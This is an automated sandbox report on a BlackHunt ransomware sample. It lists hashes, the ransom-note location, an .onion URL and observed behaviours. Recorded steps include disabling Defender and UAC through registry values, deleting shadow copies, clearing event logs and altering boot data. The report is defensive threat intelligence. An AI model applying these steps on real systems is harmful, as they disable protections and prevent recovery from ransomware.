Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
33s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:10
Static task
static1
Behavioral task
behavioral1
Sample
437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe
Resource
win10v2004-20231222-en
General
-
Target
437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe
-
Size
707KB
-
MD5
f28a3ee65ca98069a7cdbf504057168a
-
SHA1
73ff327f593fac7018db0af0ea41cf687b662854
-
SHA256
437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412
-
SHA512
8556a4cd254b6ee45ec9c6c6510da26fa5db252393429d38cb6c55a6d614c186643bad6458087c066a4abb8698e19cb1a7cf54fcc0f47b1275e15c49f50dac3d
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j8wvnh:6uaTmkZJ+naie5OTamgEoKxLWauh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7964 fsutil.exe 14448 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 12784 wevtutil.exe 14192 wevtutil.exe 9504 wevtutil.exe 14092 wevtutil.exe 14232 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2324 bcdedit.exe 7928 bcdedit.exe 15004 bcdedit.exe 14148 bcdedit.exe -
Renames multiple (3337) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7752 wbadmin.exe 14344 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\R: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\U: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\V: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\E: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\T: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\O: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\J: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\L: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\X: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\Q: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\G: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\H: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\Z: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Y: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\A: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\W: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\B: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\I: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\N: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\M: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened (read-only) \??\K: 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\core_icons.png 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dc_logo.png 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h2x.png 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_24.svg 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\virgo_mycomputer_folder_icon.svg 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\local_policy.jar 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close2x.png 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\plugin.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files\ConvertToClose.vsd 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ar-ae\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\ui-strings.js 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files\7-Zip\readme.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ar-ae\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#BlackHunt_ReadMe.txt 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\#BlackHunt_ReadMe.hta 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#BlackHunt_Private.key 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 15400 15292 WerFault.exe 267 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5196 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1984 vssadmin.exe 7000 vssadmin.exe 8000 vssadmin.exe 14388 vssadmin.exe 8024 vssadmin.exe 7988 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 14944 taskkill.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 14916 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Token: SeRestorePrivilege 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Token: SeBackupPrivilege 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Token: SeTakeOwnershipPrivilege 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Token: SeAuditPrivilege 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Token: SeSecurityPrivilege 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Token: SeIncBasePriorityPrivilege 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe Token: SeBackupPrivilege 11764 vssvc.exe Token: SeRestorePrivilege 11764 vssvc.exe Token: SeAuditPrivilege 11764 vssvc.exe Token: SeBackupPrivilege 7016 wbengine.exe Token: SeRestorePrivilege 7016 wbengine.exe Token: SeSecurityPrivilege 7016 wbengine.exe Token: SeSecurityPrivilege 14192 wevtutil.exe Token: SeBackupPrivilege 14192 wevtutil.exe Token: SeSecurityPrivilege 12784 wevtutil.exe Token: SeBackupPrivilege 12784 wevtutil.exe Token: SeSecurityPrivilege 9504 wevtutil.exe Token: SeBackupPrivilege 9504 wevtutil.exe Token: SeSecurityPrivilege 14232 wevtutil.exe Token: SeBackupPrivilege 14232 wevtutil.exe Token: SeSecurityPrivilege 14092 wevtutil.exe Token: SeBackupPrivilege 14092 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1660 wrote to memory of 2536 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 100 PID 1660 wrote to memory of 2536 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 100 PID 1660 wrote to memory of 3504 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 98 PID 1660 wrote to memory of 3504 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 98 PID 1660 wrote to memory of 3888 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 169 PID 1660 wrote to memory of 3888 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 169 PID 1660 wrote to memory of 4184 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 95 PID 1660 wrote to memory of 4184 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 95 PID 1660 wrote to memory of 772 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 101 PID 1660 wrote to memory of 772 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 101 PID 1660 wrote to memory of 5016 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 102 PID 1660 wrote to memory of 5016 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 102 PID 3504 wrote to memory of 428 3504 cmd.exe 105 PID 3504 wrote to memory of 428 3504 cmd.exe 105 PID 2536 wrote to memory of 60 2536 cmd.exe 103 PID 2536 wrote to memory of 60 2536 cmd.exe 103 PID 1660 wrote to memory of 1116 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 140 PID 1660 wrote to memory of 1116 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 140 PID 4184 wrote to memory of 4256 4184 cmd.exe 139 PID 4184 wrote to memory of 4256 4184 cmd.exe 139 PID 772 wrote to memory of 3972 772 cmd.exe 138 PID 772 wrote to memory of 3972 772 cmd.exe 138 PID 1660 wrote to memory of 4496 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 137 PID 1660 wrote to memory of 4496 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 137 PID 1660 wrote to memory of 2984 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 128 PID 1660 wrote to memory of 2984 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 128 PID 3888 wrote to memory of 3564 3888 Conhost.exe 123 PID 3888 wrote to memory of 3564 3888 Conhost.exe 123 PID 5016 wrote to memory of 5084 5016 cmd.exe 122 PID 5016 wrote to memory of 5084 5016 cmd.exe 122 PID 1660 wrote to memory of 3540 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 180 PID 1660 wrote to memory of 3540 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 180 PID 1116 wrote to memory of 2756 1116 cmd.exe 112 PID 1116 wrote to memory of 2756 1116 cmd.exe 112 PID 1660 wrote to memory of 5028 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 110 PID 1660 wrote to memory of 5028 1660 437974a8dcb097fa7d4c60f42de313055bc3526328799a6d9a6ffd14381c0412.exe 110 PID 1660 wrote to memory of 3176 1660 